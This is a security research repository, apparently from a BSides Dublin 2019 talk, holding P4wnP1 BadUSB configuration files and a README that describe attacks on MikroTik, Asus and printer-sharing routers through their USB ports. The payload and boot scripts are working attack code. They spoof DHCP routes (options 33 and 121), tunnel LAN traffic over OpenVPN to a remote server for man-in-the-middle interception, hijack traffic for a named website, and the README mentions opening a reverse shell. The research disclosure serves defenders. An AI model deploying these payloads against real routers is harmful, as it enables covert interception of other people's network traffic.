[
{
"path": ".github/CODEOWNERS",
"content": "* @tenable/zero-day @tenable/infosec\n"
},
{
"path": "README.md",
"content": "# BadUSB in Routers\nMaterial found in this repository was originally presented at [BSides Dublin](https://www.bsidesdub.ie/) on March 23, 2019. The slides are included here in pdf format.\n\nThis repository contains configuration files for [P4wnP1](https://github.com/mame82/P4wnP1), a BadUSB framework for the Raspberry Pi. The configuration files allow an attacker to execute BadUSB style attacks on certain routers.\n\nThe following hardware and software were used for the BadUSB attacks:\n\n* Raspberry Pi Zero\n* USB-A Addon\n* 8 GB microSD\n* Raspbian Stretch (Version: November 2018)\n* P4wnP1 (Version: [9c8cc09a6503f10309c04310c3bba9c07caab8b7](https://github.com/mame82/P4wnP1/tree/9c8cc09a6503f10309c04310c3bba9c07caab8b7))\n\n![](\"/images/pi.jpg\")
\n\n---\n\n## mikrotik_mitm\n\n![](\"/images/mikrotik_pi.jpg\")
\n\nThe mikrotik_mitm directory contains configuration files to man-in-the-middle outbound traffic from RouterOS LAN hosts. The configuration files were tested using RouterOS on an hAP using default configurations on 6.44.1 Stable. Presumably, it works on any RouterOS based router that supports 4g USB functionality. The attack will cause all internet bound traffic to be routed to the Raspberry Pi plugged into the USB port. The Pi will forward all of the internet traffic to a remote VPN server.\n\n*PoC Video:*\n\n[](http://www.youtube.com/watch?v=3X7xrgan5Tk)\n\nAs written the \"remote\" VPN server is at 192.168.1.64. If you are going to try this out for yourself, you'll need to adjust the openvpn connection and possibly the iptables / dhcp options depending on where your VPN server is. The VPN server configuration is fairly simple:\n\n```sh\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo openvpn --ifconfig 10.200.0.1 10.200.0.2 --dev tun --auth none\nsudo iptables -I FORWARD -i tun0 -j ACCEPT\nsudo iptables -I FORWARD -i tun0 -o ACCEPT\nsudo iptables -t nat -A POSTROUTING -j MASQUERADE\n```\n\n![](\"/images/mitm_diagram.png\")
\n\nAs mentioned, RouterOS will recognize the USB device using the default configuration. However! For some reason, the router won't recognize the Pi until you first plug in something else. You only have to do it once and then you are good until the router reboots. I'm not sure of the root cause of this. I've been using this ethernet adapter (you can find it on Amazon):\n\n![](\"/images/usb_enet_adapter.jpg\")
\n\n---\n\n## mikrotik_wan_lan_access\n\nThis is a non-mitm version of the MikroTik attack. The Pi will be assigned 192.168.4.1 and it should have access to both the WAN and LAN. LAN devices should also be able to reach the Pi. This is kind of useful if you just want to plug in your Pi as some type of local server... or if you want a reverse shell out to the internet.\n\n---\n\n## asus_bsides_routing_table\n\n![](\"/images/asus_pi.jpg\")
\n\nThe asus_bsides_routing_table directory contains configuration files to hijack traffic bound for http://securitybsides.com. The attack relies on the ability of the USB WAN to insert arbitrary entries into the router's routing table via DHCP options.\n\nThis attack was tested against an Asus RT-AC51U with load balancing dual WAN configured.\n\n*PoC Video:*\n\n[](http://www.youtube.com/watch?v=LvWo8fUaJdo)\n\n---\n\n## Traditional Attacks over IP\n\n![](\"/images/netgear_pi.jpg\")
\n\nA variety of routers support printer sharing (Netgear, Linksys, and TP-Link). The way this works is that you plug your USB printer into the router and then you install client software on your LAN host which gives it the ability to talk to the printer via the router.\n\nI've found that the router/client software will actually communicate with pretty much any USB device. For whatever reason, the device makers didn't limit the functionality to printers only.\n\nAs such, an attacker can execute any of the normal payloads that come with P4wnP1. In my PoC video, I'm using hid_keyboard2.txt. The downside to this attack is that it requires special software be installed and that the user actually click \"connect\".\n\n*PoC Video:*\n\n[](http://www.youtube.com/watch?v=aoaB6hiHGiM)\n"
},
{
"path": "asus_bsides_routing_table/boot/init_usb_ethernet.sh",
"content": "#!/bin/sh\n\n\n# This file is part of P4wnP1.\n#\n# Copyright (c) 2017, Marcus Mengs. \n#\n# P4wnP1 is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# P4wnP1 is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with P4wnP1. If not, see .\n\n\n#\n# Functions to init USB ethernet\n#\t- detect correct interface (ECM / RNDIS) --> exportet to $active_interface\n#\t- create dnsmasq DHCP configuration for interface\n\n\n\n# =================================\n# Network init\n# =================================\nfunction detect_active_interface()\n{\n\n\n\t# Waiting for one of the interfaces to get a link (either RNDIS or ECM)\n\t# loop count is limited by $RETRY_COUNT_LINK_DETECTION, to continue execution if this is used \n\t# as blocking boot script\n\t# note: if the loop count is too low, windows may not have enough time to install drivers\n\n\t# ToDo: check if operstate could be used for this, without waiting for carrieer\n\tactive_interface=\"none\"\n\n\t# if RNDIS and ECM are active check which gets link first\n\t# Note: Detection for RNDIS (usb0) is done first. In case it is active, link availability\n\t#\tfor ECM (usb1) is checked anyway (in case both interfaces got link). This is done\n\t#\tto use ECM as prefered interface on MacOS and Linux if both, RNDIS and ECM, are supported.\n\tif $USE_RNDIS && $USE_ECM; then\n\t\t# bring up both interfaces to check for physical link\n\t\tifconfig usb0 up\n\t\tifconfig usb1 up\n\n\t\techo \"CDC ECM and RNDIS active. Check which interface has to be used via Link detection\"\n\t\twhile [ \"$active_interface\" == \"none\" ]; do\n\t\t#while [[ $count -lt $RETRY_COUNT_LINK_DETECTION ]]; do\n\t\t\tprintf \".\"\n\n\t\t\tif [[ $( /dev/null && onNetworkUp\n#\n#\t\t# wait for client to receive DHCP lease\n#\t\ttarget_ip=\"\"\n#\t\twhile [ \"$target_ip\" == \"\" ]; do\n#\t\t\ttarget_ip=$(cat /tmp/dnsmasq.leases | cut -d\" \" -f3)\n#\t\tdone\n#\n#\t\t# call onNetworkUp() from payload\n#\t\tdeclare -f onTargetGotIP > /dev/null && onTargetGotIP\n#\tfi\n\n}\n\nfunction create_DHCP_config()\n{\n\t# create DHCP config file for dnsmasq\n\techo \"P4wnP1: Creating DHCP configuration for Ethernet over USB...\"\n\n\t\tcat <<- EOF > /tmp/dnsmasq_usb_eth.conf\n\t\t\tbind-interfaces\n\t\t\tport=0\n\t\t\tinterface=$active_interface\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\n\t\tEOF\n\n\t\tif $ROUTE_SPOOF; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router\n\t\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t\t# DNS\n\t\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t\t# NETBIOS NS\n\t\t\t\tdhcp-option=44,$IF_IP\n\t\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\t\t# static routes for 104.18.54.114 and 104.18.55.114\n\t\t\t\tdhcp-option=33,104.18.54.114,$IF_IP,104.18.55.114,$IF_IP\n\t\t\tEOF\n\t\telse\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router disable DHCP gateway announcment\n\t\t\t\tdhcp-option=3\n\n\t\t\t\t# disable DNS settings\n\t\t\t\tdhcp-option=6\n\t\t\tEOF\n\t\tfi\n\n\t\tif $WPAD_ENTRY; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\t\t\tEOF\n\t\tfi\n\n\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\n}\n\nfunction start_DHCP_server()\n{\n\n\t# recreate DHCP config\n\tif $ROUTE_SPOOF; then\n\t\t# DHCP config with static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,1m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# DNS\n\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t# NETBIOS NS\n\t\t\tdhcp-option=44,$IF_IP\n\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\t# static routes for 104.18.54.114 and 104.18.55.114\n\t\t\tdhcp-option=33,104.18.54.114,$IF_IP,104.18.55.114,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\telse\n\t\t# DHCP config without static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# DNS\n\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t# NETBIOS NS\n\t\t\tdhcp-option=44,$IF_IP\n\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\tfi;\n\n\n\t# start access point if needed\n\tif $WIFI && $ACCESS_POINT; then\n\t\t# start ACCESS POINT\n\t\thostapd $wdir/wifi/hostapd.conf > /dev/null &\n\t\t# configure interface\n\t\tifconfig wlan0 172.24.0.1 netmask 255.255.255.252\n\t\t# start DHCP server for WLAN interface and RNDIS/CDC ECM\n\t\tdnsmasq -C $wdir/dnsmasq.conf -C $wdir/wifi/dnsmasq_wifi.conf\n\telse\n\n\t\t# start DHCP server (listening on IF_IP)\n\t\tdnsmasq -C $wdir/dnsmasq.conf\n\tfi\n}"
},
{
"path": "asus_bsides_routing_table/payloads/asus_bsides_routing_table.txt",
"content": "# USB VID & PID. See: http://www.linux-usb.org/usb.ids\nUSB_VID=\"0x1D6B\" # Linux Foundation\nUSB_PID=\"0x0103\" # NCM (Ethernet) Gadget\n\n# Gadget features\nUSE_ECM=true # if true CDC ECM will be enabled\nUSE_RNDIS=true # if true RNDIS will be enabled\nUSE_HID=false # if true HID (keyboard) will be enabled\nUSE_RAWHID=false # if true HID raw device will be enabled\nUSE_UMS=false # if true USB Mass Storage will be enabled\n\n# disable setting of static routes for all IPv4 addresses\nROUTE_SPOOF=true\n\n# Network and DHCP options for Ethernet over USB\nIF_IP=\"192.168.4.1\" \nIF_MASK=\"255.255.255.252\" \nIF_DHCP_RANGE=\"192.168.4.2,192.168.4.2\"\n\nfunction onNetworkUp()\n{\n\tiptables -t nat -A PREROUTING -i usb1 -p tcp --dport 80 -j DNAT --to 192.168.4.1\n\n\tip route add 0.0.0.0/0 dev $active_interface\n\troute add default gw 192.168.4.2\n\n\tmkdir /home/pi/html/\n\tcd /home/pi/html/\n\techo \"lol
\" > index.html\n\tpython -m SimpleHTTPServer 80 &\n}\n"
},
{
"path": "mikrotik_mitm/boot/init_usb_ethernet.sh",
"content": "#!/bin/sh\n\n\n# This file is part of P4wnP1.\n#\n# Copyright (c) 2017, Marcus Mengs. \n#\n# P4wnP1 is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# P4wnP1 is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with P4wnP1. If not, see .\n\n\n#\n# Functions to init USB ethernet\n#\t- detect correct interface (ECM / RNDIS) --> exportet to $active_interface\n#\t- create dnsmasq DHCP configuration for interface\n\n\n\n# =================================\n# Network init\n# =================================\nfunction detect_active_interface()\n{\n\n\n\t# Waiting for one of the interfaces to get a link (either RNDIS or ECM)\n\t# loop count is limited by $RETRY_COUNT_LINK_DETECTION, to continue execution if this is used \n\t# as blocking boot script\n\t# note: if the loop count is too low, windows may not have enough time to install drivers\n\n\t# ToDo: check if operstate could be used for this, without waiting for carrieer\n\tactive_interface=\"none\"\n\n\t# if RNDIS and ECM are active check which gets link first\n\t# Note: Detection for RNDIS (usb0) is done first. In case it is active, link availability\n\t#\tfor ECM (usb1) is checked anyway (in case both interfaces got link). This is done\n\t#\tto use ECM as prefered interface on MacOS and Linux if both, RNDIS and ECM, are supported.\n\tif $USE_RNDIS && $USE_ECM; then\n\t\t# bring up both interfaces to check for physical link\n\t\tifconfig usb0 up\n\t\tifconfig usb1 up\n\n\t\techo \"CDC ECM and RNDIS active. Check which interface has to be used via Link detection\"\n\t\twhile [ \"$active_interface\" == \"none\" ]; do\n\t\t#while [[ $count -lt $RETRY_COUNT_LINK_DETECTION ]]; do\n\t\t\tprintf \".\"\n\n\t\t\tif [[ $( /dev/null && onNetworkUp\n#\n#\t\t# wait for client to receive DHCP lease\n#\t\ttarget_ip=\"\"\n#\t\twhile [ \"$target_ip\" == \"\" ]; do\n#\t\t\ttarget_ip=$(cat /tmp/dnsmasq.leases | cut -d\" \" -f3)\n#\t\tdone\n#\n#\t\t# call onNetworkUp() from payload\n#\t\tdeclare -f onTargetGotIP > /dev/null && onTargetGotIP\n#\tfi\n\n}\n\nfunction create_DHCP_config()\n{\n\t# create DHCP config file for dnsmasq\n\techo \"P4wnP1: Creating DHCP configuration for Ethernet over USB...\"\n\n\t\tcat <<- EOF > /tmp/dnsmasq_usb_eth.conf\n\t\t\tbind-interfaces\n\t\t\tport=0\n\t\t\tinterface=$active_interface\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\n\t\tEOF\n\n\t\tif $ROUTE_SPOOF; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router\n\t\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t\tdhcp-option=121,0.0.0.0/5,$IF_IP,8.0.0.0/7,$IF_IP,11.0.0.0/8,$IF_IP,12.0.0.0/6,$IF_IP,16.0.0.0/4,$IF_IP,32.0.0.0/3,$IF_IP,64.0.0.0/2,$IF_IP,128.0.0.0/2,$IF_IP,193.0.0.0/8,$IF_IP,194.0.0.0/7,$IF_IP,196.0.0.0/6,$IF_IP,200.0.0.0/5,$IF_IP,208.0.0.0/4,$IF_IP,224.0.0.0/4,$IF_IP,240.0.0.0/5,$IF_IP,248.0.0.0/6,$IF_IP\n\t\t\tEOF\n\t\telse\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router disable DHCP gateway announcment\n\t\t\t\tdhcp-option=3\n\n\t\t\t\t# disable DNS settings\n\t\t\t\tdhcp-option=6\n\t\t\tEOF\n\t\tfi\n\n\t\tif $WPAD_ENTRY; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\t\t\tEOF\n\t\tfi\n\n\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\n}\n\nfunction start_DHCP_server()\n{\n\n\t# recreate DHCP config\n\tif $ROUTE_SPOOF; then\n\t\t# DHCP config with static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,1m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\tdhcp-option=121,0.0.0.0/5,$IF_IP,8.0.0.0/7,$IF_IP,11.0.0.0/8,$IF_IP,12.0.0.0/6,$IF_IP,16.0.0.0/4,$IF_IP,32.0.0.0/3,$IF_IP,64.0.0.0/2,$IF_IP,128.0.0.0/2,$IF_IP,193.0.0.0/8,$IF_IP,194.0.0.0/7,$IF_IP,196.0.0.0/6,$IF_IP,200.0.0.0/5,$IF_IP,208.0.0.0/4,$IF_IP,224.0.0.0/4,$IF_IP,240.0.0.0/5,$IF_IP,248.0.0.0/6,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\telse\n\t\t# DHCP config without static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# DNS\n\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t# NETBIOS NS\n\t\t\tdhcp-option=44,$IF_IP\n\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\tfi;\n\n\n\t# start access point if needed\n\tif $WIFI && $ACCESS_POINT; then\n\t\t# start ACCESS POINT\n\t\thostapd $wdir/wifi/hostapd.conf > /dev/null &\n\t\t# configure interface\n\t\tifconfig wlan0 172.24.0.1 netmask 255.255.255.252\n\t\t# start DHCP server for WLAN interface and RNDIS/CDC ECM\n\t\tdnsmasq -C $wdir/dnsmasq.conf -C $wdir/wifi/dnsmasq_wifi.conf\n\telse\n\n\t\t# start DHCP server (listening on IF_IP)\n\t\tdnsmasq -C $wdir/dnsmasq.conf\n\tfi\n}"
},
{
"path": "mikrotik_mitm/payloads/mikrotik_mitm.txt",
"content": "# VID and PID stolen from a USB Ethernet Adapter\nUSB_VID=\"0x1D6B\" # Vendor ID\nUSB_PID=\"0x0237\" # Product ID\n\n# Gadget features\nUSE_ECM=true # if true CDC ECM will be enabled\nUSE_RNDIS=true # if true RNDIS will be enabled\nUSE_HID=false # if true HID (keyboard) will be enabled\nUSE_RAWHID=false # if true HID raw device will be enabled\nUSE_UMS=false # if true USB Mass Storage will be enabled\n\n# add new entries to the router table (see: init_usb_ethernet.sh)\nROUTE_SPOOF=true\n\n# assign self 192.168.4.1 and the router 192.168.4.2\nIF_IP=\"192.168.4.1\" \nIF_MASK=\"255.255.255.252\" \nIF_DHCP_RANGE=\"192.168.4.2,192.168.4.2\"\n\nfunction onNetworkUp()\n{\n\t# everything eventually goes to the router\n\troute add default gw 192.168.4.2\n\n\t# enable forwarding and be sure to ignore redirects\n\tsysctl net.ipv4.ip_forward=1\n\tsysctl net.ipv4.conf.all.accept_redirects = 0\n\t\n\t# connect to the VPN at 192.168.1.64\n\topenvpn --ifconfig 10.200.0.2 10.200.0.1 --dev tun --auth none --remote 192.168.1.64 --daemon\n\n\t# rewrite the src ip\n\tiptables -t nat -A POSTROUTING -j MASQUERADE\n\n\t# man in the middle most of the things (some obvious holes)\n\troute add -net 0.0.0.0/5 gw 10.200.0.2\n\troute add -net 8.0.0.0/7 gw 10.200.0.2\n\troute add -net 11.0.0.0/8 gw 10.200.0.2\n\troute add -net 12.0.0.0/6 gw 10.200.0.2\n\troute add -net 16.0.0.0/4 gw 10.200.0.2\n\troute add -net 32.0.0.0/3 gw 10.200.0.2\n\troute add -net 64.0.0.0/2 gw 10.200.0.2\n\troute add -net 128.0.0.0/2 gw 10.200.0.2\n\troute add -net 193.0.0.0/8 gw 10.200.0.2\n\troute add -net 194.0.0.0/7 gw 10.200.0.2\n\troute add -net 196.0.0.0/6 gw 10.200.0.2\n\troute add -net 200.0.0.0/5 gw 10.200.0.2\n\troute add -net 208.0.0.0/4 gw 10.200.0.2\n\troute add -net 224.0.0.0/4 gw 10.200.0.2\n\troute add -net 240.0.0.0/5 gw 10.200.0.2\n\troute add -net 248.0.0.0/6 gw 10.200.0.2\n}\n"
},
{
"path": "mikrotik_wan_lan_access/payloads/mikrotik_wan_lan_access.txt",
"content": "# VID and PID stolen from a USB Ethernet Adapter\nUSB_VID=\"0x1D6B\" # Vendor ID\nUSB_PID=\"0x0237\" # Product ID\n\n# Gadget features\nUSE_ECM=true # if true CDC ECM will be enabled\nUSE_RNDIS=true # if true RNDIS will be enabled\nUSE_HID=false # if true HID (keyboard) will be enabled\nUSE_RAWHID=false # if true HID raw device will be enabled\nUSE_UMS=false # if true USB Mass Storage will be enabled\n\n# Don't route extra traffic to the pi\nROUTE_SPOOF=false\n\n# assign self 192.168.4.1 and the router 192.168.4.2\nIF_IP=\"192.168.4.1\" \nIF_MASK=\"255.255.255.252\" \nIF_DHCP_RANGE=\"192.168.4.2,192.168.4.2\"\n\nfunction onNetworkUp()\n{\n\troute add default gw 192.168.4.2\n}\n\n"
}
]